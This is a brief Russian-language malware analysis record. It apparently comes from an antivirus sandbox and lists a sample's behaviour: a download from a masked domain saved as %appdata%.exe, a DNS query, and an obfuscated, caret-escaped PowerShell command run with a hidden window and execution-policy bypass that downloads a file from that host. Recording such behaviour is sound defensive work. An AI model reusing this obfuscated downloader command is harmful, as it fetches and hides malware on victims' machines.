Техническая информация
- http://zo###aseo.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Ower^sHE^ll^.^E^x^e ^-eX^e^CuTIOnP^OLI^CY Byp^as^S^ -N^OPR^of^I^le^ ^-^WIn^d^owStyl^E ^HI^d^D^E^n (NeW-OBJE^Ct sYSTem^.n^eT^.WebC^Lient).^d^ownloAdfI^L^E^('http://zo###aseo...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /C "P^Ower^sHE^ll^.^E^x^e ^-eX^e^CuTIOnP^OLI^CY Byp^as^S^ -N^OPR^of^I^le^ ^-^WIn^d^owStyl^E ^HI^d^D^E^n (NeW-OBJE^Ct sYSTem^.n^eT^.WebC^Lient).^d^ownloAdfI^L^E^('http://zo###aseo...' (со скрытым окном)